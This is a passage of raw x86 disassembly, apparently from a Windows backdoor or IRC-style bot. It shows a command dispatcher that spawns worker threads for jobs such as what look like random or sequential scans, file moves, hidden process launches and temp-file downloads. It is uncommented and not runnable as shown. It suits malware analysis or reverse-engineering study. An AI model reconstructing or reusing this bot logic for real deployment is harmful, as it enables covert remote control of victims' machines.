mov [ebp+arg_0], edi
jz short loc_4077D0
cmp byte ptr [edi], 23h
jz short loc_4077D0
push edi
lea eax, [ebp+var_484]
push 10h
push eax
call sub_41EC30
push 78h
push edi
call sub_41F720
add esp, 14h
neg eax
sbb eax, eax
neg eax
mov [ebp+var_344], eax
jmp loc_4078AA
; ---------------------------------------------------------------------------
loc_4077D0: ; CODE XREF: sub_401C87+5B17�j
; sub_401C87+5B1C�j
cmp [ebp+var_8FF], bl
jnz short loc_4077F2
cmp [ebp+var_8FE], bl
jnz short loc_4077F2
cmp [ebp+var_8EE], bl
jnz short loc_4077F2
push offset unk_4423E4
jmp loc_40713A
; ---------------------------------------------------------------------------
loc_4077F2: ; CODE XREF: sub_401C87+5B4F�j
; sub_401C87+5B57�j ...
push 10h
lea eax, [ebp+var_2D8]
pop edi
push eax
lea eax, [ebp+var_2F8]
push eax
mov [ebp+var_2D8], edi
push [ebp+arg_4]
call ds:dword_4E2F6C ; getsockname
mov al, [ebp+var_8FF]
push edi
neg al
sbb eax, eax
and ax, 100h
add eax, 0FFFFh
and [ebp+var_2F4], eax
push [ebp+var_2F4]
call ds:dword_4E3054 ; inet_ntoa
push eax
lea eax, [ebp+var_484]
push eax
call sub_41E510
add esp, 0Ch
cmp [ebp+var_8EE], bl
jz short loc_4078A4
xor eax, eax
cmp [ebp+var_8FF], bl
push 30h
setnz al
inc eax
inc eax
mov edi, eax
lea eax, [ebp+var_484]
push eax
call sub_41F5B0
pop ecx
cmp edi, ebx
pop ecx
mov byte ptr [ebp+arg_24+3], bl
jle short loc_407898
loc_407876: ; CODE XREF: sub_401C87+5C0F�j
cmp eax, ebx
jz short loc_407898
mov byte ptr [eax], 78h
lea eax, [ebp+var_484]
push 30h
push eax
call sub_41F5B0
inc byte ptr [ebp+arg_24+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+arg_24+3]
cmp ecx, edi
jl short loc_407876
loc_407898: ; CODE XREF: sub_401C87+5BED�j
; sub_401C87+5BF1�j
mov [ebp+var_344], 1
jmp short loc_4078AA
; ---------------------------------------------------------------------------
loc_4078A4: ; CODE XREF: sub_401C87+5BC7�j
mov [ebp+var_344], ebx
loc_4078AA: ; CODE XREF: sub_401C87+5B44�j
; sub_401C87+5C1B�j
mov eax, [ebp+arg_4]
push [ebp+var_88]
mov [ebp+var_374], eax
mov eax, [ebp+var_4]
mov [ebp+var_34C], eax
mov eax, [ebp+var_8]
mov [ebp+var_348], eax
mov edi, 80h
lea eax, [ebp+var_474]
push edi
push eax
call sub_41EC30
mov esi, [ebp+esi+var_78]
add esp, 0Ch
cmp esi, ebx
jz short loc_4078FB
loc_4078E8: ; CODE XREF: sub_401C87+5C97�j
push esi
loc_4078E9: ; CODE XREF: sub_401C87+5C81�j
lea eax, [ebp+var_3F4]
push edi
push eax
call sub_41EC30
add esp, 0Ch
jmp short loc_407926
; ---------------------------------------------------------------------------
loc_4078FB: ; CODE XREF: sub_401C87+5C5F�j
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_40790A
cmp byte ptr [eax], 23h
jnz short loc_40790A
push eax
jmp short loc_4078E9
; ---------------------------------------------------------------------------
loc_40790A: ; CODE XREF: sub_401C87+5C79�j
; sub_401C87+5C7E�j
mov esi, offset a2 ; "#2"
push offset word_4E2E7E
push esi
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_4078E8
mov [ebp+var_3F4], bl
loc_407926: ; CODE XREF: sub_401C87+5C72�j
cmp [ebp+var_344], ebx
mov eax, offset aRandom_1 ; "Random"
jnz short loc_407938
mov eax, offset aSequential_0 ; "Sequential"
loc_407938: ; CODE XREF: sub_401C87+5CAA�j
push [ebp+var_358]
lea ecx, [ebp+var_484]
push [ebp+var_368]
push [ebp+var_36C]
push [ebp+var_370]
push ecx
push eax
lea eax, [ebp+var_2C0]
push offset unk_442430
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push 0Bh
push eax
call sub_40B691
add esp, 2Ch
mov [ebp+var_364], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_484]
push ebx
push eax
push offset sub_40CA91
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_364]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_4079C9
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_442498
jmp loc_406190
; ---------------------------------------------------------------------------
loc_4079C1: ; CODE XREF: sub_401C87+5D48�j
push 32h
call ds:dword_4F534C ; Sleep
loc_4079C9: ; CODE XREF: sub_401C87+5D27�j
cmp [ebp+var_340], ebx
jz short loc_4079C1
jmp loc_407148
; ---------------------------------------------------------------------------
loc_4079D6: ; CODE XREF: sub_401C87+4FF0�j
; sub_401C87+5007�j
push [ebp+arg_10]
call sub_40AD91
push edi
mov [ebp+var_4E0], eax
call sub_41E710
push [ebp+arg_0]
mov [ebp+var_4F0], eax
call sub_41E710
push [ebp+arg_18]
mov [ebp+var_4EC], eax
call sub_41E710
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_88]
mov [ebp+var_4E8], eax
lea eax, [ebp+var_570]
mov [ebp+var_574], esi
push eax
call sub_41E510
add esp, 1Ch
mov edi, [ebp+var_4]
mov eax, [ebp+var_8]
mov [ebp+var_4D8], edi
push [ebp+var_4EC]
mov [ebp+var_4D4], eax
push [ebp+var_4F0]
push [ebp+var_4E8]
push [ebp+var_4E0]
call ds:dword_4E3054 ; inet_ntoa
push eax
lea eax, [ebp+var_2C0]
push offset unk_4424D0
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push 0Bh
push eax
call sub_40B691
add esp, 24h
mov [ebp+var_4E4], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_574]
push ebx
push eax
push offset sub_40CEA6
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_4E4]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_407ACE
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_442520
jmp loc_404014
; ---------------------------------------------------------------------------
loc_407AC6: ; CODE XREF: sub_401C87+5E4D�j
push 32h
call ds:dword_4F534C ; Sleep
loc_407ACE: ; CODE XREF: sub_401C87+5E2C�j
cmp [ebp+var_4D0], ebx
jz short loc_407AC6
jmp loc_404023
; ---------------------------------------------------------------------------
loc_407ADB: ; CODE XREF: sub_401C87+4FB3�j
; sub_401C87+4FCA�j
push [ebp+arg_10]
call sub_41E710
imul eax, 234h
pop ecx
cmp ds:byte_455F18[eax], bl
jz loc_409A67
cmp [ebp+var_C], ebx
jz loc_409A67
push edi
call sub_41BC70
push [ebp+arg_10]
mov esi, eax
call sub_41BC70
push [ebp+arg_8]
add esi, eax
call sub_41BC70
add eax, [ebp+var_C]
push [ebp+arg_0]
lea eax, [eax+esi+2]
push eax
call sub_41EBB0
mov esi, eax
lea eax, [ebp+var_2C0]
push esi
push offset dword_44255C
push eax
call sub_41EA60
add esp, 20h
cmp esi, ebx
jz loc_409A67
push [ebp+arg_10]
call sub_41E710
test eax, eax
pop ecx
jle loc_409A67
push [ebp+arg_10]
call sub_41E710
cmp eax, 400h
pop ecx
jge loc_409A67
push ebx
lea eax, [ebp+var_2C0]
push ebx
push eax
push edi
push [ebp+arg_10]
call sub_41E710
imul eax, 234h
pop ecx
push ds:dword_455F0C[eax]
call sub_409C75
push [ebp+arg_10]
call sub_41E710
imul eax, 234h
add esp, 18h
cmp byte ptr ds:dword_455D00[eax], 73h
jnz loc_409A67
push esi
push [ebp+arg_10]
call sub_41E710
imul eax, 234h
pop ecx
add eax, offset byte_455F18
push eax
push edi
push offset dword_442568
loc_407BCB: ; CODE XREF: sub_401C87+6046�j
lea eax, [ebp+var_2C0]
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409C75
jmp loc_40421D
; ---------------------------------------------------------------------------
loc_407BF5: ; CODE XREF: sub_401C87+4F85�j
; sub_401C87+4F9C�j
push [ebp+arg_10]
call sub_41E710
imul eax, 234h
pop ecx
cmp ds:byte_455F18[eax], bl
jz loc_409A67
cmp [ebp+var_C], ebx
jz loc_409A67
push edi
call sub_41BC70
push [ebp+arg_10]
mov esi, eax
call sub_41BC70
push [ebp+arg_8]
add esi, eax
call sub_41BC70
add eax, [ebp+var_C]
push [ebp+arg_0]
lea eax, [eax+esi+2]
push eax
call sub_41EBB0
mov esi, eax
add esp, 14h
cmp esi, ebx
jz loc_409A67
push [ebp+arg_10]
call sub_41E710
test eax, eax
pop ecx
jle loc_409A67
push [ebp+arg_10]
call sub_41E710
cmp eax, 400h
pop ecx
jge loc_409A67
push ebx
push ebx
push esi
push edi
push [ebp+arg_10]
call sub_41E710
imul eax, 234h
pop ecx
push ds:dword_455F0C[eax]
call sub_409C75
push [ebp+arg_10]
call sub_41E710
imul eax, 234h
add esp, 18h
cmp byte ptr ds:dword_455D00[eax], 73h
jnz loc_409A67
push esi
push [ebp+arg_10]
call sub_41E710
imul eax, 234h
pop ecx
add eax, offset byte_455F18
push eax
push edi
push offset dword_442578
jmp loc_407BCB
; ---------------------------------------------------------------------------
loc_407CD2: ; CODE XREF: sub_401C87+4F57�j
; sub_401C87+4F6E�j
push [ebp+arg_10]
call ds:dword_4E3008 ; inet_addr
push edi
mov [ebp+var_680], eax
call sub_41E710
push [ebp+arg_0]
mov [ebp+var_690], eax
call sub_41E710
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_88]
mov [ebp+var_688], eax
lea eax, [ebp+var_710]
mov [ebp+var_714], esi
push eax
call sub_41E510
add esp, 14h
mov edi, [ebp+var_4]
mov eax, [ebp+var_8]
mov [ebp+var_678], edi
push [ebp+var_688]
mov [ebp+var_674], eax
push [ebp+var_690]
push [ebp+var_680]
call ds:dword_4E3054 ; inet_ntoa
push eax
lea eax, [ebp+var_2C0]
push offset unk_442588
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push 0Bh
push eax
call sub_40B691
add esp, 20h
mov [ebp+var_684], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_714]
push ebx
push eax
push offset sub_40CDB5
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_684]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_407DB7
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_4425C4
jmp loc_404014
; ---------------------------------------------------------------------------
loc_407DAF: ; CODE XREF: sub_401C87+6136�j
push 32h
call ds:dword_4F534C ; Sleep
loc_407DB7: ; CODE XREF: sub_401C87+6115�j
cmp [ebp+var_670], ebx
jz short loc_407DAF
jmp loc_404023
; ---------------------------------------------------------------------------
loc_407DC4: ; CODE XREF: sub_401C87+4F29�j
; sub_401C87+4F40�j
push [ebp+arg_10]
call sub_41E710
mov [ebp+var_112C], eax
push 7Fh
lea eax, [ebp+var_1230]
push edi
push eax
call sub_41E510
push [ebp+arg_0]
call sub_41E710
push [ebp+var_88]
mov esi, [ebp+arg_4]
mov [ebp+var_1130], eax
lea eax, [ebp+var_11B0]
push 80h
push eax
mov [ebp+var_1238], esi
call sub_41EC30
mov eax, [ebp+var_8]
add esp, 20h
mov edi, [ebp+var_4]
mov [ebp+var_111C], eax
push [ebp+var_1130]
lea eax, [ebp+var_1230]
mov [ebp+var_1120], edi
push eax
push [ebp+var_112C]
push esi
call sub_40AEAD
pop ecx
push eax
lea eax, [ebp+var_2C0]
push offset unk_4425FC
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push 18h
push eax
call sub_40B691
add esp, 24h
mov [ebp+var_1128], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1238]
push ebx
push eax
push offset sub_410CBF
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_1128]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_407EB0
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_442638
jmp loc_404014
; ---------------------------------------------------------------------------
loc_407EA8: ; CODE XREF: sub_401C87+622F�j
push 32h
call ds:dword_4F534C ; Sleep
loc_407EB0: ; CODE XREF: sub_401C87+620E�j
cmp [ebp+var_1118], ebx
jz short loc_407EA8
jmp loc_404023
; ---------------------------------------------------------------------------
loc_407EBD: ; CODE XREF: sub_401C87+4EFB�j
; sub_401C87+4F12�j
push 0FFh
lea eax, [ebp+var_2878]
push [ebp+arg_10]
push eax
call sub_41E510
push 0FFh
lea eax, [ebp+var_2778]
push edi
push eax
call sub_41E510
push [ebp+arg_0]
mov [ebp+var_2674], ebx
call sub_41E710
mov [ebp+var_2670], eax
mov eax, [ebp+esi+var_80]
add esp, 1Ch
cmp eax, ebx
jz short loc_407F16
push 10h
push ebx
push eax
call sub_41F450
add esp, 0Ch
mov [ebp+var_2668], eax
jmp short loc_407F1C
; ---------------------------------------------------------------------------
loc_407F16: ; CODE XREF: sub_401C87+6279�j
mov [ebp+var_2668], ebx
loc_407F1C: ; CODE XREF: sub_401C87+628D�j
mov esi, [ebp+esi+var_7C]
cmp esi, ebx
jz short loc_407F33
push esi
call sub_41E710
pop ecx
mov [ebp+var_266C], eax
jmp short loc_407F39
; ---------------------------------------------------------------------------
loc_407F33: ; CODE XREF: sub_401C87+629B�j
mov [ebp+var_266C], ebx
loc_407F39: ; CODE XREF: sub_401C87+62AA�j
movzx eax, [ebp+var_8FB]
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_88]
mov [ebp+var_2664], eax
lea eax, [ebp+var_28F8]
mov [ebp+var_28FC], esi
push eax
call sub_41E510
mov eax, [ebp+var_4]
push edi
push [ebp+arg_10]
mov [ebp+var_265C], eax
mov eax, [ebp+var_8]
mov [ebp+var_2660], eax
lea eax, [ebp+var_2C0]
push offset unk_44267C
push eax
call sub_41EA60
push esi
lea eax, [ebp+var_2C0]
push 1Dh
push eax
call sub_40B691
add esp, 28h
mov [ebp+var_2678], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_28FC]
push ebx
push eax
push offset sub_416D68
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_2678]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_407FEA
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_4426A8
jmp loc_4082A3
; ---------------------------------------------------------------------------
loc_407FE2: ; CODE XREF: sub_401C87+6369�j
push 32h
call ds:dword_4F534C ; Sleep
loc_407FEA: ; CODE XREF: sub_401C87+6348�j
cmp [ebp+var_2658], ebx
jz short loc_407FE2
jmp loc_4082B2
; ---------------------------------------------------------------------------
loc_407FF7: ; CODE XREF: sub_401C87+4ECD�j
; sub_401C87+4EE4�j
push 7Fh
lea eax, [ebp+var_3490]
pop esi
push esi
push [ebp+arg_10]
push eax
call sub_41E510
push esi
lea eax, [ebp+var_3410]
push edi
push eax
call sub_41E510
push esi
lea eax, [ebp+var_3390]
push [ebp+arg_0]
push eax
call sub_41E510
push esi
lea eax, [ebp+var_3310]
push [ebp+var_88]
push eax
call sub_41E510
push [ebp+arg_0]
mov eax, [ebp+var_4]
mov esi, [ebp+arg_4]
mov [ebp+var_328C], eax
mov eax, [ebp+var_8]
push edi
push [ebp+arg_10]
mov [ebp+var_3288], eax
lea eax, [ebp+var_2C0]
mov [ebp+var_3494], esi
push offset unk_4426E8
push eax
call sub_41EA60
add esp, 44h
lea eax, [ebp+var_2C0]
push ebx
push 12h
push eax
call sub_40B691
add esp, 0Ch
mov [ebp+var_3290], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3494]
push ebx
push eax
push offset sub_415321
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_3290]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_4080D1
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_442724
jmp loc_4082A3
; ---------------------------------------------------------------------------
loc_4080C9: ; CODE XREF: sub_401C87+6450�j
push 32h
call ds:dword_4F534C ; Sleep
loc_4080D1: ; CODE XREF: sub_401C87+642F�j
cmp [ebp+var_3284], ebx
jz short loc_4080C9
jmp loc_4082B2
; ---------------------------------------------------------------------------
loc_4080DE: ; CODE XREF: sub_401C87+4DA1�j
; sub_401C87+4DB8�j
push 7Fh
lea eax, [ebp+var_3068]
pop esi
push esi
push [ebp+arg_10]
push eax
call sub_41E510
push esi
lea eax, [ebp+var_2FE8]
push edi
push eax
call sub_41E510
push esi
lea eax, [ebp+var_2F68]
push [ebp+arg_0]
push eax
call sub_41E510
push esi
lea eax, [ebp+var_2EE8]
push [ebp+var_88]
push eax
call sub_41E510
push [ebp+arg_0]
mov eax, [ebp+var_4]
mov esi, [ebp+arg_4]
mov [ebp+var_2E64], eax
mov eax, [ebp+var_8]
push edi
push [ebp+arg_10]
mov [ebp+var_2E60], eax
lea eax, [ebp+var_2C0]
mov [ebp+var_306C], esi
push offset unk_44275C
push eax
call sub_41EA60
add esp, 44h
lea eax, [ebp+var_2C0]
push ebx
push 0Eh
push eax
call sub_40B691
add esp, 0Ch
mov [ebp+var_2E68], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_306C]
push ebx
push eax
push offset sub_414067
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_2E68]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_4081B8
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_44278C
jmp loc_4082A3
; ---------------------------------------------------------------------------
loc_4081B0: ; CODE XREF: sub_401C87+6537�j
push 32h
call ds:dword_4F534C ; Sleep
loc_4081B8: ; CODE XREF: sub_401C87+6516�j
cmp [ebp+var_2E5C], ebx
jz short loc_4081B0
jmp loc_4082B2
; ---------------------------------------------------------------------------
loc_4081C5: ; CODE XREF: sub_401C87+4C79�j
; sub_401C87+4C90�j ...
push 7Fh
lea eax, [ebp+var_3CE4]
pop esi
push esi
push [ebp+arg_10]
push eax
call sub_41E510
push esi
lea eax, [ebp+var_3C64]
push edi
push eax
call sub_41E510
push esi
lea eax, [ebp+var_3BE4]
push [ebp+arg_0]
push eax
call sub_41E510
push esi
lea eax, [ebp+var_3B64]
push [ebp+var_88]
push eax
call sub_41E510
push 20h
lea eax, [ebp+var_3AE4]
push [ebp+arg_8]
push eax
call sub_41E510
push [ebp+arg_0]
mov eax, [ebp+var_4]
mov esi, [ebp+arg_4]
mov [ebp+var_3A64], eax
mov eax, [ebp+var_8]
push edi
push [ebp+arg_10]
mov [ebp+var_3A60], eax
lea eax, [ebp+var_2C0]
mov [ebp+var_3CEC], esi
push offset unk_4427C4
push eax
call sub_41EA60
add esp, 50h
lea eax, [ebp+var_2C0]
push ebx
push 0Dh
push eax
call sub_40B691
add esp, 0Ch
mov [ebp+var_3CE8], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3CEC]
push ebx
push eax
push offset sub_4132FC
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_3CE8]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_4082CC
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_4427F4
loc_4082A3: ; CODE XREF: sub_401C87+4EA2�j
; sub_401C87+5832�j ...
lea eax, [ebp+var_2C0]
push eax
call sub_41EA60
add esp, 0Ch
loc_4082B2: ; CODE XREF: sub_401C87+4EB7�j
; sub_401C87+5847�j ...
cmp [ebp+var_8], ebx
jnz loc_402593
push ebx
push [ebp+var_4]
jmp loc_40402E
; ---------------------------------------------------------------------------
loc_4082C4: ; CODE XREF: sub_401C87+664B�j
push 32h
call ds:dword_4F534C ; Sleep
loc_4082CC: ; CODE XREF: sub_401C87+660E�j
cmp [ebp+var_3A5C], ebx
jz short loc_4082C4
jmp short loc_4082B2
; ---------------------------------------------------------------------------
loc_4082D6: ; CODE XREF: sub_401C87+4C4B�j
; sub_401C87+4C62�j
push 7Fh
lea eax, [ebp+var_1778]
push [ebp+arg_10]
push eax
call sub_41E510
push edi
call sub_41E710
push 3Fh
mov [ebp+var_1628], eax
push [ebp+arg_0]
lea eax, [ebp+var_16F8]
push eax
call sub_41E510
mov esi, [ebp+esi+var_80]
add esp, 1Ch
cmp esi, ebx
jz short loc_408321
push 3Fh
lea eax, [ebp+var_16B8]
push esi
push eax
call sub_41E510
add esp, 0Ch
loc_408321: ; CODE XREF: sub_401C87+6686�j
lea eax, [ebp+var_16F8]
mov [ebp+var_1624], 1
push eax
lea eax, [ebp+var_1778]
push [ebp+var_1628]
push eax
lea eax, [ebp+var_2C0]
push offset dword_44282C
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push 1Fh
push eax
call sub_40B691
add esp, 20h
mov [ebp+var_1620], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_177C]
push ebx
push eax
push offset sub_4019A5
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_1620]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_4083B0
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset dword_44285C
jmp loc_406F0F
; ---------------------------------------------------------------------------
loc_4083A8: ; CODE XREF: sub_401C87+672F�j
push 32h
call ds:dword_4F534C ; Sleep
loc_4083B0: ; CODE XREF: sub_401C87+670E�j
cmp [ebp+var_161C], ebx
jz short loc_4083A8
jmp loc_406F1E
; ---------------------------------------------------------------------------
loc_4083BD: ; CODE XREF: sub_401C87+4C0B�j
; sub_401C87+4C22�j
push edi
call sub_41E710
cmp eax, ebx
pop ecx
mov [ebp+var_1D64], eax
jle loc_4084AD
push [ebp+arg_10]
mov esi, 80h
lea eax, [ebp+var_1EEC]
push esi
push eax
call sub_41EC30
xor eax, eax
cmp [ebp+var_8EE], bl
push [ebp+var_88]
setnz al
mov [ebp+var_1D60], eax
mov eax, [ebp+arg_4]
mov [ebp+var_1EF0], eax
lea eax, [ebp+var_1DEC]
push esi
push eax
call sub_41EC30
mov eax, [ebp+var_4]
push edi
push [ebp+arg_10]
mov [ebp+var_1D5C], eax
mov eax, [ebp+var_8]
mov [ebp+var_1D58], eax
push offset unk_442898
lea eax, [ebp+var_2C0]
push 200h
push eax
call sub_41EC30
push ebx
lea eax, [ebp+var_2C0]
push 15h
push eax
call sub_40B691
add esp, 38h
mov [ebp+var_1D6C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1EF0]
push ebx
push eax
push offset sub_413740
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_1D6C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_4084A0
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_4428C4
jmp loc_406190
; ---------------------------------------------------------------------------
loc_408498: ; CODE XREF: sub_401C87+681F�j
push 32h
call ds:dword_4F534C ; Sleep
loc_4084A0: ; CODE XREF: sub_401C87+67FE�j
cmp [ebp+var_1D54], ebx
jz short loc_408498
jmp loc_407148
; ---------------------------------------------------------------------------
loc_4084AD: ; CODE XREF: sub_401C87+6745�j
push offset unk_4428FC
jmp loc_40713A
; ---------------------------------------------------------------------------
loc_4084B7: ; CODE XREF: sub_401C87+4BDD�j
; sub_401C87+4BF4�j
push edi
push [ebp+arg_10]
call ds:dword_4F5388 ; MoveFileA
test eax, eax
jz short loc_4084E4
push edi
lea eax, [ebp+var_2C0]
push [ebp+arg_10]
push offset unk_442934
push 200h
push eax
call sub_41EC30
jmp loc_404247
; ---------------------------------------------------------------------------
loc_4084E4: ; CODE XREF: sub_401C87+683C�j
push offset dword_442958
call sub_418C20
push eax
lea eax, [ebp+var_2C0]
push 200h
push eax
call sub_41EC30
add esp, 10h
jmp loc_407148
; ---------------------------------------------------------------------------
loc_408508: ; CODE XREF: sub_401C87+4BAF�j
; sub_401C87+4BC6�j
push [ebp+arg_10]
lea eax, [ebp+var_3F04]
push 104h
push eax
call sub_41EC30
add esp, 0Ch
cmp [ebp+var_C], ebx
jz short loc_408542
push edi
push [ebp+var_C]
call sub_41EBB0
pop ecx
cmp eax, ebx
pop ecx
jz short loc_408542
push eax
lea eax, [ebp+var_3E00]
push eax
call sub_41EA60
pop ecx
pop ecx
loc_408542: ; CODE XREF: sub_401C87+689B�j
; sub_401C87+68AA�j
push [ebp+var_88]
lea eax, [ebp+var_3F84]
push 80h
push eax
call sub_41EC30
mov eax, [ebp+arg_4]
mov [ebp+var_3F88], eax
mov eax, [ebp+var_4]
mov [ebp+var_3CF8], eax
mov eax, [ebp+var_8]
mov [ebp+var_3CF4], eax
lea eax, [ebp+var_3E00]
push eax
lea eax, [ebp+var_3F04]
push eax
push offset unk_442964
lea eax, [ebp+var_2C0]
push 200h
push eax
call sub_41EC30
push ebx
lea eax, [ebp+var_2C0]
push 24h
push eax
call sub_40B691
add esp, 2Ch
mov [ebp+var_3CFC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3F88]
push ebx
push eax
push offset sub_417606
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_3CFC]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_408607
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_442994
loc_4085EB: ; CODE XREF: sub_401C87+8E5�j
; sub_401C87+A0D�j ...
lea eax, [ebp+var_2C0]
push eax
call sub_41EA60
add esp, 0Ch
jmp loc_402593
; ---------------------------------------------------------------------------
loc_4085FF: ; CODE XREF: sub_401C87+6986�j
push 32h
call ds:dword_4F534C ; Sleep
loc_408607: ; CODE XREF: sub_401C87+6956�j
cmp [ebp+var_3CF0], ebx
jz short loc_4085FF
jmp loc_402593
; ---------------------------------------------------------------------------
loc_408614: ; CODE XREF: sub_401C87+4B81�j
; sub_401C87+4B98�j
push 44h
lea eax, [ebp+var_668]
pop esi
push esi
push ebx
push eax
call sub_41E4B0
push [ebp+arg_10]
mov [ebp+var_668], esi
xor esi, esi
mov [ebp+var_638], bx
inc esi
mov [ebp+var_63C], esi
call sub_41E710
add esp, 10h
cmp eax, esi
jnz short loc_408653
mov [ebp+var_638], 5
loc_408653: ; CODE XREF: sub_401C87+69C1�j
cmp [ebp+var_C], ebx
jz loc_406F1E
push edi
push [ebp+var_C]
call sub_41EBB0
mov edi, eax
pop ecx
cmp edi, ebx
pop ecx
jz loc_406F1E
lea eax, [ebp+var_E10]
push eax
lea eax, [ebp+var_668]
push eax
push ebx
push ebx
push 28h
push esi
push ebx
push ebx
push edi
push ebx
call ds:dword_4F5340 ; CreateProcessA
test eax, eax
lea eax, [ebp+var_2C0]
jnz short loc_4086A2
push offset unk_4429D0
jmp loc_4064A4
; ---------------------------------------------------------------------------
loc_4086A2: ; CODE XREF: sub_401C87+6A0F�j
push edi
push offset dword_4429F4
jmp loc_406F15
; ---------------------------------------------------------------------------
loc_4086AD: ; CODE XREF: sub_401C87+4B53�j
; sub_401C87+4B6A�j
push edi
push offset aTarab ; "Tarab"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_40881F
lea eax, [ebp+var_48F0]
push eax
push 104h
call ds:dword_4F5384 ; GetTempPathA
push 0FFh
lea eax, [ebp+var_25D0]
push [ebp+arg_10]
push eax
call sub_41E510
lea eax, [ebp+var_17D0]
push eax
call sub_40B075
push eax
lea eax, [ebp+var_48F0]
push eax
lea eax, [ebp+var_24D0]
push offset dword_442A10
push eax
call sub_41EA60
mov eax, [ebp+esi+var_84]
add esp, 20h
cmp eax, ebx
mov [ebp+var_23CC], 1
mov [ebp+var_23C8], ebx
jz short loc_40873F
push 10h
push ebx
push eax
call sub_41F450
add esp, 0Ch
mov [ebp+var_23C0], eax
jmp short loc_408745
; ---------------------------------------------------------------------------
loc_40873F: ; CODE XREF: sub_401C87+6AA2�j
mov [ebp+var_23C0], ebx
loc_408745: ; CODE XREF: sub_401C87+6AB6�j
mov esi, [ebp+esi+var_80]
cmp esi, ebx
jz short loc_40875C
push esi
call sub_41E710
pop ecx
mov [ebp+var_23C4], eax
jmp short loc_408762
; ---------------------------------------------------------------------------
loc_40875C: ; CODE XREF: sub_401C87+6AC4�j
mov [ebp+var_23C4], ebx
loc_408762: ; CODE XREF: sub_401C87+6AD3�j
movzx eax, [ebp+var_8FB]
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_88]
mov [ebp+var_23BC], eax
lea eax, [ebp+var_2650]
mov [ebp+var_2654], esi
push eax
call sub_41E510
mov eax, [ebp+var_4]
push [ebp+arg_10]
mov [ebp+var_23B4], eax
mov eax, [ebp+var_8]
mov [ebp+var_23B8], eax
lea eax, [ebp+var_2C0]
push offset dword_442A1C
push eax
call sub_41EA60
push esi
lea eax, [ebp+var_2C0]
push 1Eh
push eax
call sub_40B691
add esp, 24h
mov [ebp+var_23D0], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_2654]
push ebx
push eax
push offset sub_416D68
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_23D0]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_408812
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset dword_442A48
jmp loc_406F0F
; ---------------------------------------------------------------------------
